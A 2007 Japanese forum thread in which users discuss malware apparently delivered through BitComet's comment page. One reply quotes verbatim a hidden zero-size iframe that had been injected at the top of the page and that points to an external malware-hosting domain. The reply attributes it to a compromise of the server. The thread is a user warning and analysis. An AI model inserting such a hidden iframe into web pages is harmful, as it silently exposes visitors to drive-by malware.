ホームに戻る > スレッド一覧 > 記事閲覧
[341] ceena.netで管理人がCometにウイルスをDLさせるコードがあると書いてあった・・・
日時: 2007/08/29 19:45
名前: 名無し ID:fSuMeksE

今回の質問には関係ないけど
ceena.netの管理人によるとBitComet0.90にウイルスをDLさせるコードがあるらしいです。

ceena.net
http://www.ceena.net/

[mixi] Cometはもはやクリーンではない?
http://mixi.jp/view_diary.pl?id=542997530&owner_id=1915198
メンテ

(全部表示中) もどる スレッド一覧 新規スレッド作成

タスクを選んでコメントをクリックするとダウンロードされるかもしれません ( No.1 )
日時: 2007/08/30 10:28
名前: きりしま◆.CzKQna1OU ID:.lufrzls

タスクを選んで「コメント」をクリックすると、

> Vote Votes:0 Average Score:0

というような画面が表示されるのですが、
(この画面は、http://post.bitcomet.com/ が表示しています)
このHTMLの中に何らかの条件で、トロイの木馬のようなものが仕掛けられる形跡が確認された、ということです。
HTMLソースを確認すると、

> <iframe src=http://www.unlock0453.cn/gw.htm width=0 height=0 ></iframe>

というのが先頭に挿入されており、この参照先から参照される、
> http://cxzhack.com/ma.htm
に仕込まれていると思われます。(いくつか確認しましたが、空行になってて、入らないものも存在するようです)
ですから、クライアントに含まれているのではなく、
表示させるサーバー( http://post.bitcomet.com/ )が何らかのハッキングを受けている可能性もあります。

気になる方はとりあえずコメント欄を表示しないようにするといいでしょう。
メンテ
先ほど確認してみましたが、全て修正されていましたね。 ( No.2 )
日時: 2007/09/07 10:59
名前: ceem ID:FHSoUqlA

先ほど確認してみましたが、全て修正されていましたね。
ハッキング受けて仕込まれてたということですかね・・・
メンテ

(全部表示中) もどる スレッド一覧 新規スレッド作成